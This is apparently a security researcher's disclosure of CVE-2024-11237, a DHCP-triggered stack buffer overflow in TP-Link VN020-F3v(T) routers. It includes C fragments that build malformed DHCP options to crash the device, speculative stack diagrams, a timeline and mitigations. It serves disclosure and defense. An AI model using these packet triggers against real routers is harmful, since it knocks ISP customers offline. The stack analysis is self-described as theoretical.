TP Thumper

A critical vulnerability has been discovered in TP-Link VN020 F3v(T) routers running firmware version TT_V6.2.1021. The vulnerability allows remote attackers to trigger a stack-based buffer overflow through specially crafted DHCP DISCOVER packets, leading to denial of service (DoS) conditions.

Affected Devices:

• Router Model: TP-Link VN020-F3v(T)
• Firmware Version: TT_V6.2.1021
• Deployment: Primarily through Tunisie Telecom and Topnet ISPs
• Confirmed Variants: Also affects Algerian and Moroccan versions

Important Note: Due to the proprietary nature of the firmware, the exact internal implementation details are unknown. This analysis is based on observed behavior and black-box testing.

• CVE ID: CVE-2024-11237
• Type: Stack-based Buffer Overflow (CWE-121)
• Attack Vector: Remote (DHCP DISCOVER Packet)
• Authentication: None Required
• Port: UDP/67 (DHCP Server)
• Impact: DoS (Confirmed) & RCE (Possible)
• Complexity: Low

[Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

1. DHCP Hostname Processing

// Overflow trigger through hostname option
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '';
add_option(packet, offset, 0x0C, 127, long_hostname);

2. Vendor-Specific Option

// Vendor option manipulation
unsigned char vendor_specific[] = { 
    0x00, 0x14, 0x22,  // TP-Link vendor prefix
    0xFF, 0xFF, 0xFF   // Trigger condition
};
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);

3. Length Field Manipulation

// Claimed vs actual length mismatch
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });

While the exact internal implementation is unknown, the observed behavior suggests potential memory corruption issues:

Normal DHCP Hostname Processing

Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

What could potentially be happening inside the router?

Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

This is theoretical, and certain details may not be entirely accurate, as TP-Link provides the firmware for this router exclusively to ISPs.

Router may also try to restart it self as shown here due to the crash as shown here:

• Immediate device unresponsiveness
• DHCP service failure
• Automatic router restart
• Network disruption requiring manual intervention

• Initial Discovery: October 20, 2024
• Vendor Notification: November 3, 2024
• CVE Assignment: November 15, 2024

No official patch is currently available. Temporary mitigations include:

1. Disable DHCP server if not required
2. Implement DHCP traffic filtering at network edge
3. Consider alternative router models if possible

1. CVE-2024-11237
2. CWE-121: Stack-based Buffer Overflow

Mohamed Maatallah

• GitHub: @Zephkek
• Affiliation: Independent Security Researcher